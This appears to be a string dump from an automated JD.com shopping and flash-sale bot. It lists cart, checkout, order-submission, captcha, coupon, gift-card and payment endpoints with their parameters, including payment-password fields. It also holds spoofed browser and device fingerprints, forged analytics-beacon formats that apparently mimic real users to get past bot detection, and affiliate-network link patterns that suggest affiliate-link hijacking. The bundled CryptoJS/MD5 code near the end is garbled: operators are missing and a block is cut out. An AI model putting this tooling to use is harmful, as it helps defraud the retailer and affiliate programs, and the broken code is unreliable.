hXXp://ad.ta355.cn/r.php?rf=http://count.chanet.com.cn/click.cgi?a=504471&d=22338&u=a18898212&e=&url=http%3A%2F%2FVVV.jd.com%2F
hXXp://union.click.jd.com/jdc?e=&p=AyIBZRprFDJWWA1FBCVbV0IUEEULRFRBSkAOClBMW2VEBVBDT1cdQw4lAyICZWtbFAMSBVAfWBVSEgRXGlMcARY3N***&t=W1dCFBBFC0RUQUpADgpQTFs=
hXXp://VVV.51bi.com/u/vUFzI3/
hXXp://dwz.cn/1gqao6
hXXp://c.duomai.com/track.php?site_id=xxx&aid=xx&euid=&t=http://VVV.jd.com/
hXXp://union.click.jd.com/jdc?d=QTjqgK
hXXp://union.click.jd.com/jdc?e=&p=AyIHZR5bEgoWBFYfXSUCFgVUHVsXBRYGZV8ETVxNNwxeHlQJDBkNXg9JHUlSSkkFSRwSA1caXRUAFQNUBAJQXk83IGg4bVRvXjd4W00cbnsDWVlAAltgAxdXJQMiB1QaWhQGEwRUHmslY2A3FHVZEgYXBmUeWxICGgJdGFwlAhcAURNTFgcRBlUfWSUAEg==&t=W1dCFBBFC1pXUwkEAEAdQFkJBVsRABMBVRlcEQMNXhBHBg==
orderInfo.orderStatusShow
orderInfo.sendTime
orderInfo.sendTip
(*.txt)|*.txt
*.xls|*.xls
&clientVersion=5.0.0&build=27662&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=baidu&area=&networkType=wifi&sign=
hXXp://ware.m.jd.com/client.action?functionId=thirdAddress&uuid=
hXXp://cart.jd.com/cart/initCart.action?pcount=
hXXp://cart.jd.com/cart/dynamic/gate.action?pid=
hXXp://cart.jd.hk/gate.action?pid=
hXXp://gate.jd.com/InitCart.aspx?pid=
hXXp://item.jd.hk/
hXXp://item.jd.com/
hXXp://p.3.cn/prices/mgets?skuids=J_
hXXp://cart.jd.com/cart/initCart.action?pid=
hXXp://cart.jd.com/tcart?pid=
cart.specialSuits
].products
cart.specialSuits[
].mainSku.id
].products[
].selectPromotions
].promotionType
].selectPromotions[
].promotionId
].promotionShortInfo
].promotion.promoId
hXXp://cart.jd.com/changePromotion.action
&origin=1&callback=Promotions.set
hXXp://pi.3.cn/promoinfo/get?id=
Promotions.set(
].adwordGiftSkuList
].giftType
].adwordGiftSkuList[
].skuId
hXXp://cart.jd.com/cart/removeGiftFromCart.action
].promoId
hXXp://cart.jd.hk/cart?r=
hXXp://cart.jd.com/cart/getCart.action?r=
].promotionSelectState
hXXp://cart.jd.com/changeJbeanPromotion.action?rd
application/x-www-form-urlencoded; charset=UTF-8
hXXp://cart.jd.hk/gotoOrder.action?flowId=10&rd=
hXXp://cart.jd.com/cart
authorize.jd.hk
hXXp://cart.jd.com/cart.action?r=
hXXp://authorize.jd.hk/auth/doAuth.action?r=
hXXp://authorize.jd.hk/auth/authPage.action
hXXp://trade.jd.hk/order/getOrderInfo.action?flowId=10&rid=
trade.jd.hk
hXXp://trade.jd.com/shopping/dynamic/balance/useBalance.action
hXXp://trade.jd.hk/shopping/order/getOrderInfo.action?flowId=10rid=
hXXp://trade.jd.com/shopping/async/obtainOrderExt.action
hXXp://trade.jd.com/shopping/order/getOrderInfo.action?rid=1439647032374
&submitOrderParam.remark=
hXXp://cart.jd.com/selectAllItem.action
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
&srcid=trackWeb&is=
hXXp://captcha.jd.com/verify/image?acid=
&submitOrderParam.checkCodeRid=
&submitOrderParam.checkcodeTxt=
hXXp://x.jd.com/clkinfo?rid=
&submitOrderParam.sopNotPutInvoice=true&submitOrderParam.trackID=
&submitOrderParam.payPassword=
.action
hXXp://trade.jd.hk/shopping/order/submit
&submitOrderParam.sopNotPutInvoice=false&submitOrderParam.payPassword=
overseaPurchaseCookies=&submitOrderParam.trackID=
hXXp://trade.jd.com/shopping/order/submit
hXXp://success.jd.com/success/success.action?orderId=
hXXp://trade.jd.com/shopping/order/getLocOrderInfo.action?r=
hXXp://s.trade.jd.com/success/loadSuccess.action
hXXp://s.trade.jd.com
orderid=(\d{1,})&PassKey=(.*?)\\.*?ftx-01\\.\>(\d.*?)
&PassKey=
hXXp://order.jd.com/normal/item.action?orderid=
hXXp://VVV.jd.com/
hXXp://cart.jd.com/cart/cart.html?r=1409064605264
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
sortedWebCartResult.allSkuIds
hXXp://cart.jd.com/batchRemoveSkusFromCart.action
p.yiqifa.com
VVV.51bi.com
p.egou.com
c.duomai.com
hXXp://p.egou.com/n?k=2mLErnWFWlwLrI6H2mLErI6HWNRSWE4H1n2SWljqrn376mqECPPBCJ4HkQLErnzm6nXwMJ2mrIW-&e=c&t=hXXp://VVV.jd.com/|
//p.yiqifa.com
//p.egou.com
&t=hXXp://VVV.jd.com
&t=hXXp://item.jd.com/
&t=hXXp://m.jd.com
&t=hXXp://item.m.jd.com/ware/view.action?wareId=
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322)
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19
union.click.jd.com/
count.chanet.com.cn/click
(hXXp://union.click.jd.com.*?)[\s"]
dwz.cn
178hui.com
hXXp://cart.jd.com/cart/dynamic/gateForSubFlow.action?wids=
hXXp://trade.jd.com/shopping/order/getPresalInfo.action?r=
&flowType=15&submitOrderParam.ignorePriceChange=0&submitOrderParam.btSupport=0
overseaPurchaseCookies=&submitOrderParam.sopNotPutInvoice=false&submitOrderParam.presalePayType=1&submitOrderParam.trackID=
&submitOrderParam.presalePayType=2&submitOrderParam.trackID=
overseaPurchaseCookies=&submitOrderParam.sopNotPutInvoice=false&submitOrderParam.presaleMobile=
keyword
hXXp://api.m.jd.com/client.action?functionId=search&uuid=
key":"
expressionKey"
expressionKey
].wareId
].venderId
&clientVersion=5.0.0&build=27662&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&&partner=jingdong1&area=
hXXp://ngw.m.jd.com/client.action?functionId=searchWareInShop&uuid=
].wname
hXXp://api.m.jd.com/client.action?functionId=skuDyInfo&uuid=
hXXp://api.m.jd.com/client.action?functionId=commentCount&uuid=
hXXp://api.m.jd.com/client.action?functionId=emTab&uuid=
hXXp://search.jd.com/Search?keyword=
&enc=utf-8&qrst=1&rt=1&stop=1&vt=2&sttr=1&exp_key=
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
hXXp://search.jd.com/
hXXp://search.jd.com/brand.php?keyword=
item.jd.com/
hXXp://search.jd.com/s_new.php?keyword=
&enc=utf-8&qrst=1&rt=1&stop=1&vt=2&exp_key=
&enc=utf-8&suggest=1.his.0&wq=&pvid=9usi11oi.4ve1gseiox82
//item.jd.com/
hXXp://mall.jd.com/index-
button01').click
mall.jd.com/advance_search-
hXXp://mall.jd.com/advance_search-
-60.html
hXXp://diviner.jd.com/cookie?ck=1455.
hXXp://x.jd.com/aview?ck=12072.
firefox
chrome
45.0.2454.85
||12||8||jr.jd.com||-||referral||-||0||-||
||item.jd.com||18.0 r0||win||
hXXp://csc.jd.com/log.ashx?type1=J&type2=A&pin=
$tad=-$pinid=
$zb=1$cb=16$usc=direct$ucp=-$umd=none$uct=-$lt=0$ct=
$yb=
$xb=
$wb=
$bv=
$hn=item.jd.com$fl=18.0 r0$os=win$br=
$ul=zh-cn$cs=GBK$dt=
|1&v=je=1$sc=24-bit$sr=
hXXp://mercury.jd.com/log.gif?t=VVV.100000&m=UA-J2011-1&pin=
&clientVersion=4.4.1&build=23145&client=android&d_brand=samsung&d_model=SM-N9008&osVersion=4.4.2&screen=1875*1080&partner=jingdong&area=19_1609_41655_41723&networkType=wifi&st=
hXXp://ware.m.jd.com/client.action?functionId=skuDetail&uuid=
wareInfo.shopInfo.shop.name
wareInfo.shopInfo.shop.shopId
wareInfo.basicInfo.brandID
hXXp://chat1.jd.com/api/checkChat?&callback=jQuery5455436&_=
hXXp://api.m.jd.com/client.action?functionId=addFavorite&uuid=
hXXp://t.jd.com/product/followProduct.action?productId=
hXXp://api.m.jd.com/client.action?functionId=followShop&uuid=
hXXp://follow.soa.jd.com/vender/follow?venderId=
hXXp://follow-soa.jd.com/rest/brand/follow?sysName=pinpaijie.jd.com&brandId=
hXXp://brand.jd.com/pinpai/
hideAreaIds").val('
hXXp://trade.jd.com/shopping/dynamic/consignee/consigneeList.action
hXXp://trade.jd.com/order/getOrderInfo.action?rid=
hXXp://trade.jd.com/shopping/dynamic/consignee/saveConsignee.action
hXXp://trade.jd.com/shopping/dynamic/consignee/editConsignee.action?consigneeId=
&consigneeParam.isUpdateCommonAddress=1&consigneeParam.giftSenderConsigneeName=&consigneeParam.giftSendeConsigneeMobile=&consigneeParam.noteGiftSender=false&consignee_ceshi1=&consigneeParam.idCard=&flowType=15
&consigneeParam.commonConsigneeSize=
&consigneeParam.townName=
&consigneeParam.countyName=
&consigneeParam.cityName=
&consigneeParam.provinceName=
&consigneeParam.phone=
&consigneeParam.email=
&consigneeParam.mobile=
&consigneeParam.address=
&consigneeParam.townId=
&consigneeParam.countyId=
&consigneeParam.cityId=
&consigneeParam.provinceId=
&consigneeParam.type=1&consigneeParam.name=
hXXp://trade.jd.com/shopping/dynamic/consignee/setAllDefaultAddress.action
hXXp://trade.jd.com/shopping/dynamic/invoice/editInvoice.action
hXXp://trade.jd.com/shopping/dynamic/invoice/getElectroInvoice.action
invoiceParam.electroInvoicePhone" value="
hXXp://trade.jd.com/shopping/dynamic/invoice/getGenenalInvoice.action
invokeInvoiceBasicService=true&invoiceParam.usualInvoiceId=
hXXp://trade.jd.com/shopping/dynamic/invoice/getVatInvoice.action
&invoiceParam.electroInvoicePhone=
&invoiceParam.electroInvoiceEmail=
&invoiceParam.electroCompanyName=
&invoiceParam.selectElectroTitle=
&invoiceParam.sendSeparate=false&invoiceParam.usualInvoiceId=
&invoiceParam.consigneeTownId=
&invoiceParam.consigneeTown=
&invoiceParam.consigneeCountyId=
&invoiceParam.consigneeCounty=
&invoiceParam.consigneeCityId=
&invoiceParam.consigneeCity=
&invoiceParam.consigneeProvinceId=
&invoiceParam.consigneeProvince=
&invoiceParam.consigneeAddress=
&invoiceParam.consigneePhone=
&invoiceParam.consigneeName=
&invoiceParam.hasBook=
&invoiceParam.hasCommon=
&invoiceParam.regBankAccount=
&invoiceParam.regBank=
&invoiceParam.regPhone=
&invoiceParam.regAddr=
&invoiceParam.code=
&invoiceParam.vatCompanyName=
&invoiceParam.selectNormalInvoiceContent=
&invoiceParam.selectBookInvoiceContent=
&invoiceParam.selectInvoiceTitle=
&invoiceParam.companyName=
invoiceParam.selectedInvoiceType=
hXXp://trade.jd.com/shopping/dynamic/invoice/saveInvoice.action
hXXp://invoice.jd.com/user/userinfo/zpzz.html
hXXp://invoice.jd.com/user/zpzz/delZpzz.action
vatQualification.id=
hXXp://invoice.jd.com/user/zpzz/addZpzz.action
&vatQualification.account=
&vatQualification.bank=
&vatQualification.phone=
&vatQualification.address=
&vatQualification.taxId=
vatQualification.company=
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 115Browser/5.2.6
hXXp://invoice.jd.com/user/zpAddr/updateAddress.action
hXXp://trade.jd.com/shopping/dynamic/giftCard/getGiftCardList.action
giftCardParam.giftCardType=3
hXXp://trade.jd.com/shopping/dynamic/giftCard/cancelGiftCard.action
giftCardParam.giftCardType=3&giftCardKey=
&clientVersion=5.0.0&build=27662&client=android&d_brand=samsung&d_model=GT-I8150&osVersion=4.4.2&screen=865*506&partner=jingdong1&area=
&clientVersion=5.1.0&build=31030&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=jd-m&area=
orderInfo.customerName
orderInfo.mobile
orderInfo.address
//details.jd.com/normal/item.action?orderid=
hXXp://details.jd.com/normal/item.action?orderid=
wareInfo.basicInfo.isOP
hXXp://cart.jd.com/cart/getTcart.action?pid=
].manGiftSkus
].giftSelectState
].manGiftSkus[
].giftAddMoney
].imgUrl
hXXp://img10.360buyimg.com/cms/s80x80_
].name
].mainSku.name
].mainSku.num
].mainSku.sumDiscountedPrice
hXXp://cart.jd.com/cart/addGiftsOfMZ.action
hXXp://trade.jd.hk/shopping/dynamic/consignee/editConsignee.action?consigneeId=
hXXp://trade.jd.hk/shopping/order/getOrderInfo.action?flowId=10&rid=
consigneeParam.idCard
consigneeParam.name
consigneeParam.mobile
consigneeParam.phone
consigneeParam.email
hXXp://trade.jd.hk/shopping/dynamic/consignee/consigneeList.action
hXXp://trade.jd.hk/shopping/dynamic/consignee/saveConsignee.action
&consigneeParam.idCard=
&consigneeParam.isUpdateCommonAddress=1&consigneeParam.giftSenderConsigneeName=&consigneeParam.giftSendeConsigneeMobile=&consigneeParam.noteGiftSender=false&consignee_ceshi1=
consigneeShowView.id
hXXp://trade.jd.hk/shopping/dynamic/consignee/setAllDefaultAddress.action
&consigneeParam.addType=0
&consigneeParam.isUpdateCommonAddress=1&consigneeParam.giftSenderConsigneeName=&consigneeParam.giftSendeConsigneeMobile=&consigneeParam.noteGiftSender=false&consignee_ceshi1=&consigneeParam.idCard=
hXXp://trade.jd.com/shopping/dynamic/consignee/editConsignee.action?t=
trade.jd.com
/shopping/dynamic/payAndShip/getVenderInfo.action
&shipParam.pickShipmentItemCurr=false
shipParam.payId=
&saveParam.promiseType=&saveParam.promiseDate=&saveParam.promiseTimeRange=&saveParam.promiseSendPay=&saveParam.promiseMessage=&saveParam.jdBigItemNightShip=false&saveParam.otherShipmentType=&saveParam.otherShipTime=&saveParam.otherBigItemShipOffset=&saveParam.otherBigItemInstallTimeOffset=&saveParam.sopOtherShipmentType=&saveParam.pickShipmentType=&saveParam.pickSiteId=&saveParam.pickDate=&saveParam.pickSiteNum=5&saveParam.pickRegionId=
&saveParam.jdBigItemInstallTimeOffest=
&saveParam.jdShipmentType=65&saveParam.jdShipTime=4&saveParam.jdPayWayId=0&saveParam.jdCheckType=2&saveParam.jdBigItemShipTimeOffset=
saveParam.paymentId=
/shopping/dynamic/payAndShip/savePayAndShip.action
/order/getOrderInfo.action?rid=
/shopping/dynamic/payAndShip/getAdditShipment.action
&shipParam.reset311=0
/shopping/order/getOrderInfo.action?rid=
selfPick.selectedPickView.pickId
selfPick.pickDate
selfPick.pickSiteNum
selfPick.pickShipSelected
&saveParam.pickRegionId=
&saveParam.pickSiteNum=
&saveParam.pickDate=
&saveParam.promiseType=1&saveParam.promiseDate=&saveParam.promiseTimeRange=&saveParam.promiseSendPay=&saveParam.promiseMessage=&saveParam.jdBigItemNightShip=false&saveParam.otherShipmentType=&saveParam.otherShipTime=&saveParam.otherBigItemShipOffset=&saveParam.otherBigItemInstallTimeOffset=&saveParam.sopOtherShipmentType=&saveParam.pickShipmentType=&saveParam.pickSiteId=
&saveParam.jdCheckType=2&saveParam.jdBigItemShipTimeOffset=
&saveParam.jdShipTime=3&saveParam.jdPayWayId=
&saveParam.jdShipmentType=
suportShipType
promise311.support
promise311.days
].hours
promise311.days[
].hours[
].date
promise311.timeRangeTitle[
].week
&saveParam.pickRegionId=-1
&saveParam.promiseMessage=&saveParam.jdBigItemNightShip=false&saveParam.otherShipmentType=&saveParam.otherShipTime=&saveParam.otherBigItemShipOffset=&saveParam.otherBigItemInstallTimeOffset=&saveParam.sopOtherShipmentType=&saveParam.pickShipmentType=&saveParam.pickSiteId=
&saveParam.promiseSendPay=
&saveParam.promiseTimeRange=
&saveParam.promiseType=1&saveParam.promiseDate=
&saveParam.jdShipTime=4&saveParam.jdPayWayId=
&saveParam.promiseMessage=&saveParam.jdBigItemNightShip=false&saveParam.otherShipmentType=&saveParam.otherShipTime=&saveParam.otherBigItemShipOffset=&saveParam.otherBigItemInstallTimeOffset=&saveParam.sopOtherShipmentType=&saveParam.pickShipmentType=64&saveParam.pickSiteId=
/shopping/async/payAndShip/getPickSiteByRegion.action
&shipParam.pickSiteNum=100&shipParam.regionId=-1
&shipParam.payId=
shipParam.pickSiteId=
].cabinetAvailable
].pickId
].pickName
].address
].pickDate
/shopping/dynamic/coupon/getCoupons.action
/shopping/dynamic/coupon/getBestVertualCoupons.action
/shopping/dynamic/coupon/cancelCoupon.action
&couponParam.pageNum=1
couponParam.couponId=
/shopping/dynamic/coupon/useCoupon.action
couponParam.couponKey=
/dynamic/coupon/cancelCoupon.action
hXXp://trade.jd.com/shopping/dynamic/jdbean/useJdBean.action
jdBeanParam.usedJdBean=0
jdBeanParam.usedJdBean=
&giftCardKey=
giftCardParam.giftCardType=
hXXp://trade.jd.com/shopping/dynamic/giftCard/useGiftCard.action
hXXp://trade.jd.com/shopping/dynamic/giftCard/useMaterialGiftCard.action
hXXp://trade.jd.com/shopping/dynamic/giftCard/bindGiftCard.action
giftCardParam.giftCardType=2
giftCardParam.giftCardType=2&giftCardKey=
for(var i = 0; i < str.length; i  ){
val  = "u"   str.charCodeAt(i).toString(16);
(payment.pay.action.id=
order.jd360.hk/normal/item.action?orderid=
hXXps://cashier.jd.hk/
name=.requestInfo.*?value="(.*?)"
name=.baiTiaoRepayDate.*?value="(.*?)"
hXXp://cashier.jd.com/lazy/checkPassword.action
hXXps://cashier.jd.com/payment/combinationVirtualPay.action
hXXps://b2c.icbc.com.cn/servlet/ICBCINBSEBusinessServlet
randomKey=
hXXps://b2c.icbc.com.cn/icbc/newperbank/NewShop/UIpretification/b2c_TwoDimensionCode_inside.jsp?dse_sessionId=
hXXp://st.3.cn/gsis.html?skuids=
hXXp://item.ko.jd.com/itemShowBtn?skuId=
/koFail.html
.jd.com/captcha
.jd.com/validate/getCaptcha?skuId=
hXXp://ko.jd.com/m/captcha.html?skuId=
hXXp://ko.jd.com/validate/getCaptcha?skuId=
.jd.com/validate/goToOrder?skuId=
url":"
.jd.com/validate/repeatGoToOrder?skuId=
koFail.html
text/html,application/xhtml xml,application/xml;q=0.9,text/vnd.wap.wml,*/*;q=0.8
.jd.com/async/getUsualAddressList.action?skuId=
[0].id
[0].mobileKey
[0].provinceId
[0].cityId
[0].countyId
[0].townId
[0].provinceName
[0].cityName
[0].countyName
[0].townName
[0].name
[0].mobile
[0].email
[0].mobileWithXing
[0].addressDetail
&orderParam.codTimeType=3&orderParam.sendPayFor411=&orderParam.mobileKey=
&orderParam.townName=
&orderParam.countyName=
&orderParam.cityName=
&num=1&orderParam.provinceName=
&orderParam.usualAddressId=
&orderParam.invoiceCompanyName=
&orderParam.invoiceContent=
&orderParam.password=&orderParam.invoiceTitle=
&orderParam.paymentType=
&orderParam.townId=
&orderParam.countyId=
&orderParam.cityId=
&orderParam.provinceId=
&orderParam.email=
&orderParam.mobile=
&orderParam.addressDetail=
orderParam.name=
.jd.com/seckill/submitOrder.action?skuId=
.jd.com/async/getCouponList.action?skuId=
couponType="(\d{1,})".*?couponId="(.*?)".*?couponKey="(.*?)".*?hookbox(.*?)>[\s\S]{1,200}>(\d.*?)[\s-]{1,5}(\d.*?)<
.jd.com/async/cancelCoupon.action?skuId=
couponType="1".*?couponId="(.*?)".*?couponKey="(.*?)".*?hookbox(.*?)>[\s\S]{1,200}>(
couponType="1".*?couponId="(.*?)".*?couponKey="(.*?)".*?hookbox(.*?)>[\s\S]{1,200}>(\d.*?)[\s-]{1,5}(\d.*?)<
.jd.com/async/useCoupon.action?skuId=
operations
hXXp://api.m.jd.com/client.action?functionId=cartAdd&uuid=
cartInfo.vendors
].sorted
cartInfo.vendors[
].itemType
].sorted[
].item.Id
].item.Num
].item.suitType
].item.Skus
].item.Skus[
].Num
].item.Gifts
].item.Gifts[
].AwardType
].item.SType
isOpenPaymentPassword
isSupportAllInvoice
hXXp://api.m.jd.com/client.action?functionId=currentOrder&uuid=
hXXp://api.m.jd.com/client.action?functionId=cartCheckAll&uuid=
hXXp://api.m.jd.com/client.action?functionId=cartRemove&uuid=
hXXp://api.m.jd.com/client.action?functionId=cart&uuid=
hXXp://api.m.jd.com/client.action?functionId=miaoShaClock&uuid=
hXXp://api.m.jd.com/client.action?functionId=miaoShaAreaList&uuid=
].canSelectPromotions
].type
].canSelectPromotions[
].title
].checkType
hXXp://api.m.jd.com/client.action?functionId=changePromotion&uuid=
].Gifts
].PriceShow
].Gifts[
hXXp://api.m.jd.com/client.action?functionId=cartRemoveGift&uuid=
].jBeans.id
cartInfo.PriceShow
shoppingCart_webSite
securityPayPassword
hXXp://api.m.jd.com/client.action?functionId=getInternationalAuthInfo&uuid=
authInfo.isAuth
http://v.m.jd.com/international/index.action
hXXp://v.m.jd.com/international/getInternationalAuthInfo.json?sid=
hXXp://v.m.jd.com/international/index.action?sid=
jdapp;android;5.1.0;4.3;
lastOderInfo.virtualPay.needRemark
lastOderInfo.address
].value
lastOderInfo.usedJdBeanMap.canUseJdBeanCount
lastOderInfo.usedJdBeanMap.useJdBeanCount
lastOderInfo.usedJdBeanMap.totalJdBeanCount
lastOderInfo.usedJdBeanMap.IsUseJdBean
lastOderInfo.virtualPay.IsUseBalance
lastOderInfo.virtualPay.DiscountLipinka
hXXp://api.m.jd.com/client.action?functionId=useBalancePay&uuid=
OrderStr.isUseJdBean
OrderStr.isOpenPaymentPassword
OrderStr.needRemark
OrderStr.canUseJdBeanCount
OrderStr.useJdBeanCount
OrderStr.totalJdBeanCount
hXXp://api.m.jd.com/client.action?functionId=useJdBeanPay&uuid=
].label
].operator
lastOderInfo.payShipMap.payment.paymentName
lastOderInfo.invoice.IdInvoiceType
lastOderInfo.invoice.CompanyName
lastOderInfo.payShipMap.pickShipment.id
&clientVersion=5.0.0&build=27662&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=baidu&area=
hXXp://cart.m.jd.com/client.action?functionId=cartCheckAll&uuid=
SupportJdBean
hXXp://order.m.jd.com/client.action?functionId=submit
].stockStatus
submitOrder.OrderId
submitOrder.FactPrice
submitOrder.OrderType
].parentId
].orderMsg.wareInfoList
].orderMsg.wareInfoList[
].buyCount
].paymentType
].orderStatus
inputPassword
submitOrder.noStockSkuList
submitOrder.noStockSkuList[
hXXp://api.m.jd.com/client.action?functionId=getAddressByPin&uuid=
body={}&
].IdCity
].addressDetail
].IdTown
].Where
].Name
].addressDefault
].Mobile
].IdArea
].IdProvince
lastOderInfo.param.needRemark
supportJdBean
isShortPwd
CryptoJS v3.1.2
code.google.com/p/crypto-js
code.google.com/p/crypto-js/wiki/License
var CryptoJS=CryptoJS||function(u,l){var d={},n=d.lib={},p=function(){},s=n.Base={extend:function(a){p.prototype=this;var c=new p;a&&c.mixIn(a);c.hasOwnProperty("init")||(c.init=function(){c.$super.init.apply(this,arguments)});c.init.prototype=c;c.$super=this;return c},create:function(){var a=this.extend();a.init.apply(a,arguments);return a},init:function(){},mixIn:function(a){for(var c in a)a.hasOwnProperty(c)&&(this[c]=a[c]);a.hasOwnProperty("toString")&&(this.toString=a.toString)},clone:function(){return this.init.prototype.extend(this)}},
q=n.WordArray=s.extend({init:function(a,c){a=this.words=a||[];this.sigBytes=c!=l?c:4*a.length},toString:function(a){return(a||v).stringify(this)},concat:function(a){var c=this.words,m=a.words,f=this.sigBytes;a=a.sigBytes;this.clamp();if(f%4)for(var t=0;t<a;t  )c[f t>>>2]|=(m[t>>>2]>>>24-8*(t%4)&255)<<24-8*((f t)%4);else if(65535<m.length)for(t=0;t<a;t =4)c[f t>>>2]=m[t>>>2];else c.push.apply(c,m);this.sigBytes =a;return this},clamp:function(){var a=this.words,c=this.sigBytes;a[c>>>2]&=4294967295<<
32-8*(c%4);a.length=u.ceil(c/4)},clone:function(){var a=s.clone.call(this);a.words=this.words.slice(0);return a},random:function(a){for(var c=[],m=0;m<a;m =4)c.push(4294967296*u.random()|0);return new q.init(c,a)}}),w=d.enc={},v=w.Hex={stringify:function(a){var c=a.words;a=a.sigBytes;for(var m=[],f=0;f<a;f  ){var t=c[f>>>2]>>>24-8*(f%4)&255;m.push((t>>>4).toString(16));m.push((t&15).toString(16))}return m.join("")},parse:function(a){for(var c=a.length,m=[],f=0;f<c;f =2)m[f>>>3]|=parseInt(a.substr(f,
2),16)<<24-4*(f%8);return new q.init(m,c/2)}},b=w.Latin1={stringify:function(a){var c=a.words;a=a.sigBytes;for(var m=[],f=0;f<a;f  )m.push(String.fromCharCode(c[f>>>2]>>>24-8*(f%4)&255));return m.join("")},parse:function(a){for(var c=a.length,m=[],f=0;f<c;f  )m[f>>>2]|=(a.charCodeAt(f)&255)<<24-8*(f%4);return new q.init(m,c)}},x=w.Utf8={stringify:function(a){try{return decodeURIComponent(escape(b.stringify(a)))}catch(c){throw Error("Malformed UTF-8 data");}},parse:function(a){return b.parse(unescape(encodeURIComponent(a)))}},
r=n.BufferedBlockAlgorithm=s.extend({reset:function(){this._data=new q.init;this._nDataBytes=0},_append:function(a){"string"==typeof a&&(a=x.parse(a));this._data.concat(a);this._nDataBytes =a.sigBytes},_process:function(a){var c=this._data,m=c.words,f=c.sigBytes,t=this.blockSize,b=f/(4*t),b=a?u.ceil(b):u.max((b|0)-this._minBufferSize,0);a=b*t;f=u.min(4*a,f);if(a){for(var e=0;e<a;e =t)this._doProcessBlock(m,e);e=m.splice(0,a);c.sigBytes-=f}return new q.init(e,f)},clone:function(){var a=s.clone.call(this);
a._data=this._data.clone();return a},_minBufferSize:0});n.Hasher=r.extend({cfg:s.extend(),init:function(a){this.cfg=this.cfg.extend(a);this.reset()},reset:function(){r.reset.call(this);this._doReset()},update:function(a){this._append(a);this._process();return this},finalize:function(a){a&&this._append(a);return this._doFinalize()},blockSize:16,_createHelper:function(a){return function(c,m){return(new a.init(m)).finalize(c)}},_createHmacHelper:function(a){return function(c,m){return(new e.HMAC.init(a,
m)).finalize(c)}}});var e=d.algo={};return d}(Math);
(function(){var u=CryptoJS,l=u.lib.WordArray;u.enc.Base64={stringify:function(d){var n=d.words,l=d.sigBytes,s=this._map;d.clamp();d=[];for(var q=0;q<l;q =3)for(var w=(n[q>>>2]>>>24-8*(q%4)&255)<<16|(n[q 1>>>2]>>>24-8*((q 1)%4)&255)<<8|n[q 2>>>2]>>>24-8*((q 2)%4)&255,v=0;4>v&&q 0.75*v<l;v  )d.push(s.charAt(w>>>6*(3-v)&63));if(n=s.charAt(64))for(;d.length%4;)d.push(n);return d.join("")},parse:function(d){var n=d.length,p=this._map,s=p.charAt(64);s&&(s=d.indexOf(s),-1!=s&&(n=s));for(var s=[],q=0,w=0;w<
n;w  )if(w%4){var v=p.indexOf(d.charAt(w-1))<<2*(w%4),b=p.indexOf(d.charAt(w))>>>6-2*(w%4);s[q>>>2]|=(v|b)<<24-8*(q%4);q  }return l.create(s,q)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /="}})();
(function(u){function l(b,e,a,c,m,f,t){b=b (e&a|~e&c) m t;return(b<<f|b>>>32-f) e}function d(b,e,a,c,m,f,t){b=b (e&c|a&~c) m t;return(b<<f|b>>>32-f) e}function n(b,e,a,c,m,f,t){b=b (e^a^c) m t;return(b<<f|b>>>32-f) e}function p(b,e,a,c,m,f,t){b=b (a^(e|~c)) m t;return(b<<f|b>>>32-f) e}for(var s=CryptoJS,q=s.lib,w=q.WordArray,v=q.Hasher,q=s.algo,b=[],x=0;64>x;x  )b[x]=4294967296*u.abs(u.sin(x 1))|0;q=q.MD5=v.extend({_doReset:function(){this._hash=new w.init([1732584193,4023233417,2562383102,271733878])},
_doProcessBlock:function(r,e){for(var a=0;16>a;a  ){var c=e a,m=r[c];r[c]=(m<<8|m>>>24)&16711935|(m<<24|m>>>8)&4278255360}var a=this._hash.words,c=r[e 0],m=r[e 1],f=r[e 2],t=r[e 3],y=r[e 4],q=r[e 5],s=r[e 6],w=r[e 7],v=r[e 8],u=r[e 9],x=r[e 10],z=r[e 11],A=r[e 12],B=r[e 13],C=r[e 14],D=r[e 15],g=a[0],h=a[1],j=a[2],k=a[3],g=l(g,h,j,k,c,7,b[0]),k=l(k,g,h,j,m,12,b[1]),j=l(j,k,g,h,f,17,b[2]),h=l(h,j,k,g,t,22,b[3]),g=l(g,h,j,k,y,7,b[4]),k=l(k,g,h,j,q,12,b[5]),j=l(j,k,g,h,s,17,b[6]),h=l(h,j,k,g,w,22,b[7]),
C,15,b[50]),h=p(h,j,k,g,q,21,b[51]),g=p(g,h,j,k,A,6,b[52]),k=p(k,g,h,j,t,10,b[53]),j=p(j,k,g,h,x,15,b[54]),h=p(h,j,k,g,m,21,b[55]),g=p(g,h,j,k,v,6,b[56]),k=p(k,g,h,j,D,10,b[57]),j=p(j,k,g,h,s,15,b[58]),h=p(h,j,k,g,B,21,b[59]),g=p(g,h,j,k,y,6,b[60]),k=p(k,g,h,j,z,10,b[61]),j=p(j,k,g,h,f,15,b[62]),h=p(h,j,k,g,u,21,b[63]);a[0]=a[0] g|0;a[1]=a[1] h|0;a[2]=a[2] j|0;a[3]=a[3] k|0},_doFinalize:function(){var b=this._data,e=b.words,a=8*this._nDataBytes,c=8*b.sigBytes;e[c>>>5]|=128<<24-c2;var m=u.floor(a/
